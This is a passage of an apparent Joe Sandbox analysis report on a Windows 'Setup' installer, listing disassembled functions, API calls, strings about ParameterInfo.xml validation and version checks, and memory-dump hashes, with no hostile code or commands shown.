6c927c1f call 6c94833e 2176->2181 2182 6c928bab-6c928bad 2176->2182 2187 6c928be6-6c928be8 2181->2187 2188 6c928bec-6c928c37 call 6c919703 call 6c968f0e call 6c94833e 2181->2188 2182->2181 2187->2188 2195 6c928c39-6c928c3b 2188->2195 2196 6c928c3f-6c928c67 call 6c9189b7 call 6c968f0e 2188->2196 2195->2196 2201 6c928c69-6c928c6b 2196->2201 2202 6c928c6f-6c928c77 call 6c91922c 2196->2202 2201->2202 2205 6c928d0f-6c928d36 call 6c94833e 2202->2205 2206 6c928c7d-6c928cfc call 6c94833e * 2 call 6c91838a call 6c968f0e * 2 call 6c918415 call 6c968f0e call 6c91a378 2202->2206 2212 6c928d38-6c928d3a 2205->2212 2213 6c928d3e-6c928d87 call 6c919703 call 6c94833e call 6c91a2b5 call 6c968f0e * 2 2205->2213 2251 6c928d01-6c928d0a call 6c9714aa 2206->2251 2212->2213 2234 6c928e00-6c928e11 call 6c927fb3 2213->2234 2235 6c928d89-6c928d9d call 6c932d50 2213->2235 2242 6c928e13-6c928e15 2234->2242 2243 6c928e19-6c928e20 call 6c976f06 2234->2243 2245 6c928db3 2235->2245 2246 6c928d9f-6c928da7 2235->2246 2242->2243 2250 6c928db7-6c928dc6 call 6c968f0e 2245->2250 2247 6c928da9-6c928dab 2246->2247 2248 6c928dad-6c928db1 2246->2248 2247->2245 2247->2248 2248->2250 2250->2234 2256 6c928dc8-6c928dfb call 6c94833e * 2 call 6c91838a 2250->2256 2251->2205 2256->2251
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C9287B7
                                                                • Part of subcall function 6C921D3D: __EH_prolog3.LIBCMT ref: 6C921D44
                                                                • Part of subcall function 6C921D3D: __CxxThrowException@8.LIBCMT ref: 6C921E11
                                                                • Part of subcall function 6C9195C1: __EH_prolog3.LIBCMT ref: 6C9195C8
                                                                • Part of subcall function 6C9195C1: VariantInit.OLEAUT32(?), ref: 6C9195DB
                                                                • Part of subcall function 6C9195C1: SysFreeString.OLEAUT32(?), ref: 6C91960E
                                                                • Part of subcall function 6C9195C1: VariantClear.OLEAUT32(00000008), ref: 6C91962E
                                                                • Part of subcall function 6C91A378: __EH_prolog3.LIBCMT ref: 6C91A37F
                                                              • __CxxThrowException@8.LIBCMT ref: 6C928D0A
                                                                • Part of subcall function 6C9714AA: KiUserExceptionDispatcher.NTDLL(?,?,6C96C129,00000C00,?,?,?,?,6C96C129,00000C00,6C98BA3C,6C9A76D4,00000C00,00000020,6C94F845,?), ref: 6C9714EC
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$Exception@8ThrowVariant$ClearDispatcherExceptionFreeInitStringUser
                                                              • String ID: 1$ActionTable$ApplicableIf$Compressed$Compressed items need to have URL and CompressedDownloadSize authored.$CustomErrorHandling$Exe$InstallCommandLine$IsPresent$LogFileHint$ParameterInfo.xml$RepairCommandLine$UninstallCommandLine$schema validation failure: wrong number of EXE child nodes!
                                                              • API String ID: 1022868530-2895508641
                                                              • Opcode ID: aeb6f09b79ee5cefa7e804d9e17a533aac9df4a29847427ea26ad9291d5709c9
                                                              • Instruction ID: 65a87636faf8e65f8ce43f7701e55b53c1529f2958ba9fd77cd7bfebb2c3f13b
                                                              • Opcode Fuzzy Hash: aeb6f09b79ee5cefa7e804d9e17a533aac9df4a29847427ea26ad9291d5709c9
                                                              • Instruction Fuzzy Hash: 0A323C71A14249EFDB04DFA8C944ADDBBB9BF29308F148559F824EBB80C734DA05CB65
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C959D05 Relevance: 28.3, APIs: 2, Strings: 14, Instructions: 311COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 6C9139AD: __EH_prolog3.LIBCMT ref: 6C9139B4
                                                              • GetCommandLineW.KERNEL32(512AC3CC,?,00000000,ParameterInfo.xml,?,?,?,00000000,?,?,?,?,ParameterInfo.xml,?,00000000,?), ref: 6C959D54
                                                                • Part of subcall function 6C913E77: __EH_prolog3.LIBCMT ref: 6C913E7E
                                                                • Part of subcall function 6C913A16: __EH_prolog3.LIBCMT ref: 6C913A1D
                                                              • __CxxThrowException@8.LIBCMT ref: 6C959EBD
                                                              Strings
                                                              • lower, xrefs: 6C959FFA
                                                              • higher, xrefs: 6C95A001, 6C95A017
                                                              • SetupVersion not specified, xrefs: 6C959E1F
                                                              • SetupVersion specified in ParameterInfo.xml is , xrefs: 6C95A029
                                                              • Command line switch 'NoSetupVersionCheck' found - so not performing SetupVersion check., xrefs: 6C959D95
                                                              • Current SetupVersion = %s, xrefs: 6C959D43
                                                              • SetupVersion specified in ParameterInfo.xml has a minor version lower than the currently supported version., xrefs: 6C959F44
                                                              • than the currently supported version., xrefs: 6C95A006
                                                              • SetupVersion specified in ParameterInfo.xml has a minor version greater than the currently supported version., xrefs: 6C959F58
                                                              • ParameterInfo.xml, xrefs: 6C959E2E, 6C959F67, 6C95A096
                                                              • 1.0, xrefs: 6C959D3D, 6C959D42, 6C959ED4, 6C959EFB
                                                              • SetupVersion specified in ParameterInfo.xml is '%s', xrefs: 6C959EC3
                                                              • NoSetupVersionCheck, xrefs: 6C959D6C
                                                              • SetupVersion, xrefs: 6C959DC0
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$CommandException@8LineThrow
                                                              • String ID: than the currently supported version.$1.0$Command line switch 'NoSetupVersionCheck' found - so not performing SetupVersion check.$Current SetupVersion = %s$NoSetupVersionCheck$ParameterInfo.xml$SetupVersion$SetupVersion not specified$SetupVersion specified in ParameterInfo.xml has a minor version greater than the currently supported version.$SetupVersion specified in ParameterInfo.xml has a minor version lower than the currently supported version.$SetupVersion specified in ParameterInfo.xml is $SetupVersion specified in ParameterInfo.xml is '%s'$higher$lower
                                                              • API String ID: 1129948358-1674238012
                                                              • Opcode ID: 7b41c9a092c94d4b99411f9c4e4b58637ed58a99c49116cf8231428bcbd857ee
                                                              • Instruction ID: 5e6eb1e9faaf4ba4f84b463cd1f64826e8cbb10e126f90d236820380c67e5f51
                                                              • Opcode Fuzzy Hash: 7b41c9a092c94d4b99411f9c4e4b58637ed58a99c49116cf8231428bcbd857ee
                                                              • Instruction Fuzzy Hash: 33C17E725087809FD314DB78C840B9FBBE8AFA6358F144A1DF1A1C7B91DB34D9098B96
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C929847 Relevance: 26.9, APIs: 2, Strings: 13, Instructions: 646COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C929851
                                                                • Part of subcall function 6C96C0AA: _malloc.LIBCMT ref: 6C96C0C4
                                                                • Part of subcall function 6C96C0AA: std::exception::exception.LIBCMT ref: 6C96C0F9
                                                                • Part of subcall function 6C96C0AA: std::exception::exception.LIBCMT ref: 6C96C113
                                                                • Part of subcall function 6C96C0AA: __CxxThrowException@8.LIBCMT ref: 6C96C124
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C918AAC: __EH_prolog3.LIBCMT ref: 6C918AB3
                                                                • Part of subcall function 6C918AAC: __CxxThrowException@8.LIBCMT ref: 6C918B39
                                                                • Part of subcall function 6C918D44: __EH_prolog3.LIBCMT ref: 6C918D4B
                                                                • Part of subcall function 6C92784C: __EH_prolog3.LIBCMT ref: 6C927853
                                                                • Part of subcall function 6C918D44: __CxxThrowException@8.LIBCMT ref: 6C918EFD
                                                                • Part of subcall function 6C921D3D: __EH_prolog3.LIBCMT ref: 6C921D44
                                                                • Part of subcall function 6C921D3D: __CxxThrowException@8.LIBCMT ref: 6C921E11
                                                                • Part of subcall function 6C921C2E: __EH_prolog3.LIBCMT ref: 6C921C35
                                                                • Part of subcall function 6C921C2E: __CxxThrowException@8.LIBCMT ref: 6C921D02
                                                                • Part of subcall function 6C948CD5: __EH_prolog3.LIBCMT ref: 6C948CDC
                                                                • Part of subcall function 6C91838A: __EH_prolog3.LIBCMT ref: 6C918391
                                                                • Part of subcall function 6C91A378: __EH_prolog3.LIBCMT ref: 6C91A37F
                                                              • __CxxThrowException@8.LIBCMT ref: 6C92A060
                                                                • Part of subcall function 6C9714AA: KiUserExceptionDispatcher.NTDLL(?,?,6C96C129,00000C00,?,?,?,?,6C96C129,00000C00,6C98BA3C,6C9A76D4,00000C00,00000020,6C94F845,?), ref: 6C9714EC
                                                                • Part of subcall function 6C918329: __EH_prolog3.LIBCMT ref: 6C918330
                                                                • Part of subcall function 6C91A3BC: __EH_prolog3.LIBCMT ref: 6C91A3C3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$Exception@8Throw$std::exception::exception$DispatcherExceptionUser_malloc
                                                              • String ID: $<$A helper with this name already exists. All helper names must be unique. : $ActionTable$ApplicableIf$Cannot create the helper item: $CommandLine$InstalledProductSize$IsPresent$Name$ParameterInfo.xml$Patches$SystemDriveSize
                                                              • API String ID: 2177076360-1307745120
                                                              • Opcode ID: aadbb837fae04275e1fe7195d591f9a2be74f9de6059a96ecb36a25c43fb7837
                                                              • Instruction ID: 7792083b81f1611943f615fed0b1d43c8fc74607001c4fc06d2dccfd58d1ff74
                                                              • Opcode Fuzzy Hash: aadbb837fae04275e1fe7195d591f9a2be74f9de6059a96ecb36a25c43fb7837
                                                              • Instruction Fuzzy Hash: F7525971D11209EFDB00CFE8C944BEEBBB8AF19318F204159E454BBA94D774DA09DBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C92293D Relevance: 26.7, APIs: 2, Strings: 13, Instructions: 416COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C922944
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C922677: __EH_prolog3.LIBCMT ref: 6C92267E
                                                                • Part of subcall function 6C91838A: __EH_prolog3.LIBCMT ref: 6C918391
                                                                • Part of subcall function 6C91A378: __EH_prolog3.LIBCMT ref: 6C91A37F
                                                              • __CxxThrowException@8.LIBCMT ref: 6C922C00
                                                                • Part of subcall function 6C9714AA: KiUserExceptionDispatcher.NTDLL(?,?,6C96C129,00000C00,?,?,?,?,6C96C129,00000C00,6C98BA3C,6C9A76D4,00000C00,00000020,6C94F845,?), ref: 6C9714EC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$DispatcherExceptionException@8ThrowUser
                                                              • String ID: 8$Blockers$ParameterInfo.xml$StopBlockers$SuccessBlockers$WarnBlockers$schema validation failure: More than 1 Stop Block defined.$schema validation failure: More than 1 Success Block defined.$schema validation failure: More than 1 Warning Block defined.$schema validation failure: Stop blockers has no child node$schema validation failure: Success blockers has no child node$schema validation failure: Warn blockers has no child node$schema validation failure: no valid child element found for 'Blockers' node.
                                                              • API String ID: 3417717588-4180151753
                                                              • Opcode ID: b8ea3dbfc28cac2a9d7cf94a379098bcb359752c82855810e34e4c170e446f38
                                                              • Instruction ID: fff72e24e359e68767edac71fcb4f7ac8fd031a91e3730b9a8383865cd7c8d11
                                                              • Opcode Fuzzy Hash: b8ea3dbfc28cac2a9d7cf94a379098bcb359752c82855810e34e4c170e446f38
                                                              • Instruction Fuzzy Hash: D9F1B271914249EBCF04CBE8C944ADE7BB9AF25358F148159F024EBF81DB34DA09DB61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C622C9B Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 295memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • VirtualAlloc.KERNEL32(00000000,?,00002000,00000004,6C6227B0,00000000,6C640088), ref: 6C622D01
                                                              • VirtualAlloc.KERNEL32(?,00000000,00001000,00000004,000003F8,00000000,?,?,?,?,6C6227B0,00000000,6C640088), ref: 6C622D4F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303901253.000000006C621000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C620000, based on PE: true
                                                              • Associated: 00000004.00000002.3303864433.000000006C620000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303946399.000000006C640000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303986988.000000006C641000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c620000_Setup.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID: Local\SqmData_%s
                                                              • API String ID: 4275171209-1264235261
                                                              • Opcode ID: 561a7edf179f15570037c96137bcea5a5a3cd1752c0e3cb227fad39e7b465604
                                                              • Instruction ID: e84c097a062d5d901b959cd5cd7a63c09675624cceaf1fb70c6ccd1405ab1a2a
                                                              • Opcode Fuzzy Hash: 561a7edf179f15570037c96137bcea5a5a3cd1752c0e3cb227fad39e7b465604
                                                              • Instruction Fuzzy Hash: 28B1E0712042609FDB608F21CC84F5577F5BB01798F20E4A8E99ADBAA1DB35D889CF5C
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C91BB3C Relevance: 21.3, APIs: 2, Strings: 10, Instructions: 260COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C91BB43
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                              • __CxxThrowException@8.LIBCMT ref: 6C91BDEB
                                                              Strings
                                                              • BlockingMutex, xrefs: 6C91BC9D
                                                              • DisabledCommandLineSwitches, xrefs: 6C91BB52
                                                              • ParameterInfo.xml, xrefs: 6C91BD6A
                                                              • schema validation failure: there must be a valid child element for Configuration., xrefs: 6C91BD5C
                                                              • Using Serial Download and Install mechanism, xrefs: 6C91BDFA
                                                              • Using Simultaneous Download and Install mechanism, xrefs: 6C91BE01
                                                              • AdditionalCommandLineSwitches, xrefs: 6C91BBA6
                                                              • FilesInUseSetting, xrefs: 6C91BCEF
                                                              • UserExperienceDataCollection, xrefs: 6C91BBF8
                                                              • DownloadInstallSetting, xrefs: 6C91BC4B
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$Exception@8Throw
                                                              • String ID: AdditionalCommandLineSwitches$BlockingMutex$DisabledCommandLineSwitches$DownloadInstallSetting$FilesInUseSetting$ParameterInfo.xml$UserExperienceDataCollection$Using Serial Download and Install mechanism$Using Simultaneous Download and Install mechanism$schema validation failure: there must be a valid child element for Configuration.
                                                              • API String ID: 2489616738-904804324
                                                              • Opcode ID: 91e8a2fd85492e8ab5ed1faef775e4aa942fae0b4269b81374e3df91a8abdb10
                                                              • Instruction ID: a6322061a8aea3dfa287d25a561168a74795b01d957724eb0a45b9e467470879
                                                              • Opcode Fuzzy Hash: 91e8a2fd85492e8ab5ed1faef775e4aa942fae0b4269b81374e3df91a8abdb10
                                                              • Instruction Fuzzy Hash: 6BA15FB1904209EFDB04DFA8C945AEEBBB9BF29318F144555F425E7B80C734EA04CBA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C49D353 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 163windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetParent.USER32(?), ref: 6C49D38D
                                                                • Part of subcall function 6C48E153: GetWindowLongW.USER32(?,000000F0), ref: 6C48E179
                                                                • Part of subcall function 6C48E153: GetParent.USER32 ref: 6C48E18B
                                                                • Part of subcall function 6C48E153: GetWindowRect.USER32(?,?), ref: 6C48E1A5
                                                                • Part of subcall function 6C48E153: GetWindowLongW.USER32(?,000000F0), ref: 6C48E1BB
                                                                • Part of subcall function 6C48E153: MonitorFromWindow.USER32(?,00000002), ref: 6C48E1DA
                                                              • SetWindowTextW.USER32(?,?), ref: 6C49D3A3
                                                                • Part of subcall function 6C49D149: __EH_prolog3.LIBCMT ref: 6C49D150
                                                                • Part of subcall function 6C49D149: LoadImageW.USER32(00000000,?,00000001,00000020,00000020,00000010), ref: 6C49D198
                                                                • Part of subcall function 6C49D149: SendMessageW.USER32(?,00000080,00000001,00000000), ref: 6C49D1AF
                                                                • Part of subcall function 6C49D149: LoadImageW.USER32(00000000,?,00000001,00000020,00000020,00000010), ref: 6C49D1E4
                                                                • Part of subcall function 6C49D149: GetDlgItem.USER32(?,00000068), ref: 6C49D1F5
                                                                • Part of subcall function 6C49D149: SendMessageW.USER32(00000000,00000170,?,00000000), ref: 6C49D209
                                                                • Part of subcall function 6C49D149: LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 6C49D231
                                                                • Part of subcall function 6C49D149: GetDlgItem.USER32(?,00000069), ref: 6C49D242
                                                                • Part of subcall function 6C49D149: SendMessageW.USER32(00000000,000000F7,00000001,?), ref: 6C49D256
                                                                • Part of subcall function 6C49D149: LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 6C49D27E
                                                                • Part of subcall function 6C49D073: __EH_prolog3.LIBCMT ref: 6C49D07A
                                                                • Part of subcall function 6C49D073: SetDlgItemTextW.USER32(?,00000065,?), ref: 6C49D130
                                                              • GetDlgItem.USER32(?,00000066), ref: 6C49D3B9
                                                                • Part of subcall function 6C490B11: SetWindowLongW.USER32(?,000000FC,?), ref: 6C490B2D
                                                              • SendMessageW.USER32(?,00000445,00000000,04000000), ref: 6C49D3E4
                                                                • Part of subcall function 6C49D86C: _memset.LIBCMT ref: 6C49D8B6
                                                                • Part of subcall function 6C49D86C: SendMessageW.USER32(?,0000043A,00000001,?), ref: 6C49D8D9
                                                              • SendMessageW.USER32(?,000000CF,00000001,00000000), ref: 6C49D3FC
                                                                • Part of subcall function 6C49CFA5: __EH_prolog3.LIBCMT ref: 6C49CFAC
                                                                • Part of subcall function 6C49CFA5: GetDlgItem.USER32(?,00000067), ref: 6C49D018
                                                                • Part of subcall function 6C49CFA5: SetWindowLongW.USER32(?,000000FC,?), ref: 6C49D041
                                                                • Part of subcall function 6C49CFA5: SetDlgItemTextW.USER32(?,00000067,?), ref: 6C49D05A
                                                                • Part of subcall function 6C49D2BF: __EH_prolog3.LIBCMT ref: 6C49D2C6
                                                                • Part of subcall function 6C49D2BF: SetDlgItemTextW.USER32(?,0000000B,00000000), ref: 6C49D2FC
                                                                • Part of subcall function 6C49D2BF: SetDlgItemTextW.USER32(?,00000008,00000000), ref: 6C49D33B
                                                              • GetDlgItem.USER32(?,0000000B), ref: 6C49D424
                                                              • KiUserCallbackDispatcher.NTDLL(00000000,00000000), ref: 6C49D42D
                                                              • GetDlgItem.USER32(?,00000069), ref: 6C49D482
                                                              • GetDlgItem.USER32(?,0000006A), ref: 6C49D4D5
                                                              • PostMessageW.USER32(?,000006F5,00000000,00000000), ref: 6C49D53E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: Item$MessageWindow$Send$Text$H_prolog3ImageLoadLong$Parent$CallbackDispatcherFromMonitorPostRectUser_memset
                                                              • String ID: IDS_PRINT$IDS_SAVE
                                                              • API String ID: 3208048787-3437764585
                                                              • Opcode ID: 433fb32cd25b2a1191a81353e15a54faa5ddd37d1812f52a3a72e5629ab43b48
                                                              • Instruction ID: 688476a0a203159ed0cab55fc27741d7d3f7929e56ef35ee47fc5d9f0316bd04
                                                              • Opcode Fuzzy Hash: 433fb32cd25b2a1191a81353e15a54faa5ddd37d1812f52a3a72e5629ab43b48
                                                              • Instruction Fuzzy Hash: C5513875604201AFDB10DF64C884F5ABBE5FF8A318F000A1DF555AB7A0DB71E8188B92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C91787B Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 96registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C917882
                                                              • RegOpenKeyExW.KERNEL32(80000002,Software\Microsoft\PCHealth\ErrorReporting\DW\Installed,00000000,00020019,?,00000014,6C91781A,?,6C94831D,00000000), ref: 6C9178B2
                                                              • RegQueryValueExW.ADVAPI32(?,DW0200,00000000,00000000,?,?,?,6C94831D,00000000), ref: 6C9178D8
                                                              • RegCloseKey.ADVAPI32(?,?,6C94831D,00000000), ref: 6C9178E4
                                                              • GetFileAttributesW.KERNEL32(?,?,6C94831D,00000000), ref: 6C9178F9
                                                              • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,?,?,6C94831D,00000000), ref: 6C91790E
                                                              • GetFileAttributesW.KERNEL32(?,?,6C94831D,00000000), ref: 6C917931
                                                              • GetFileAttributesW.KERNEL32(?,?,6C94831D,00000000), ref: 6C91798A
                                                              Strings
                                                              • Software\Microsoft\PCHealth\ErrorReporting\DW\Installed, xrefs: 6C9178A8
                                                              • DW0200, xrefs: 6C9178C9
                                                              • DW\DW20.exe, xrefs: 6C91795E
                                                              • \Microsoft Shared\DW\DW20.exe, xrefs: 6C91791D
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: AttributesFile$CloseFolderH_prolog3OpenPathQueryValue
                                                              • String ID: DW0200$DW\DW20.exe$Software\Microsoft\PCHealth\ErrorReporting\DW\Installed$\Microsoft Shared\DW\DW20.exe
                                                              • API String ID: 2337823764-2373061612
                                                              • Opcode ID: 218b4757838623ec9dc3a263c66aba6c7fd289992b22be7525f29942c8ffc99b
                                                              • Instruction ID: 60de010e2db5edcc0610249d1ebbecb2b84d64b03a5bedde2f85a9be0a0c1bb4
                                                              • Opcode Fuzzy Hash: 218b4757838623ec9dc3a263c66aba6c7fd289992b22be7525f29942c8ffc99b
                                                              • Instruction Fuzzy Hash: 2D31857191020EAFEF108BA4CC85EBFB67DBF1535DF100625E520A6A90D734C915DBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C48D923 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 228memoryfileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C48D92A
                                                                • Part of subcall function 6C49E8E8: __EH_prolog3.LIBCMT ref: 6C49E8EF
                                                              • PathIsRelativeW.SHLWAPI(00000000,00000000,?,00000000,00000008,6C49E271,00000000,?,?,00000DF0,?,?), ref: 6C48D960
                                                              • GetModuleFileNameW.KERNEL32(00000010,00000104,?,00000000,00000008,6C49E271,00000000,?,?,00000DF0,?,?), ref: 6C48D9BA
                                                              • PathCombineW.SHLWAPI(?,?,?,00000000,?,00000000,00000008,6C49E271,00000000,?,?,00000DF0,?,?), ref: 6C48DA0D
                                                              • __CxxThrowException@8.LIBCMT ref: 6C48DAAF
                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,00000000,00000000,00000002,?,80000000,00000001,00000003,00000080,00000000,00000000), ref: 6C48DAD0
                                                              • SysAllocStringLen.OLEAUT32(00000000,?), ref: 6C48DB07
                                                              • ReadFile.KERNEL32(?,?,?,?,00000000,?,00000000,00000008,6C49E271,00000000,?,?,00000DF0,?,?), ref: 6C48DB38
                                                              • FindCloseChangeNotification.KERNEL32(?,?,00000000,00000008,6C49E271,00000000,?,?,00000DF0,?,?), ref: 6C48DBB5
                                                              Strings
                                                              • Could not find mandatory data file %s. This is a bad package., xrefs: 6C48DB6E
                                                              • ReadXML failed to open XML file %s, with error %d, xrefs: 6C48DA8B
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmpDownload File
